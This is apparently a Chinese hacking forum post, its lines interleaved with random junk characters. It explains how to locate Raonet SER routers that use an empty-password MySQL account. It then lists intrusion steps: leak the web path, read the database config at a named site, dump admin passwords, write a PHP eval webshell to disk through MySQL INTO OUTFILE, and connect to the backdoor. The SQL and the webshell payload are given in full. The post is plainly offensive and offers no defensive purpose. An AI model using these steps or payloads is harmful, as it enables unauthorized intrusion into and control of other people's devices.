寻找存在漏洞的路由器方法:
L/ T& f. Z$ h
* `( d1 D+ Q0 w! a, i- ?% D1:google搜索'Raonet Subscriber Ethernet Router'
# ~% L7 N, n* A
F& ?( _ p, ~# Y) |4 T2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
( q% T, t9 p/ \8 l$ P( p- @
0 L+ Z7 f# k- i+ f$ u3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。* o% D) l+ V5 a1 w3 H9 E
$ E; ~9 b1 R+ A) \3 Y! M( k
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
5 ^- a$ X3 h5 k3 e5 m! [0 [) a/ Y/ w+ F
& n- F3 c6 ~/ s. K+ V) @2 H l
& F3 p _4 B) }3 I
入侵步骤:
$ U1 e4 E9 t, c* A4 u& D5 h7 [
1 w) m- q# e* _3 z% [1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
7 |1 ?+ V; ^- P7 p6 n" i" F8 q8 v! [, {5 D" c0 U1 b( |4 q2 S i" i
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
2 F7 W1 Q* P( C2 T* B3:得到密码后连接,查看GUI管理密码:
% ?# V0 f; l, }use ser_500! _+ T7 y- z0 K4 g/ G4 t1 e! ~
select id,passwd from user;
. d) v5 e+ ~7 Q; {% b R9 M4:通过数据库写入webshell,执行命令:* n0 z1 {* ~ ^
use mysql;$ t$ A% T2 ^# S+ y5 p& @, o9 J
create table ok(cmd TEXT);8 Q" w3 h$ z) A" j
insert into ok values("<?php @eval($_POST[cmd])?>");
: F1 l5 i% ?* a! v! I; [& ~select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";& b8 V+ Y) a7 z! Y: B$ A
drop table ok;
$ X' G: T# ?+ X3 e8 g5 o7 w
: N5 a2 O# f |5:连接后门shell.php
$ W6 {. t% o ?
C/ e- Y! u% m* C9 G6. 搞定!
+ V3 n4 U& O% `8 Q3 c; y) E8 C: g* G8 [. m5 z# ]& Q
|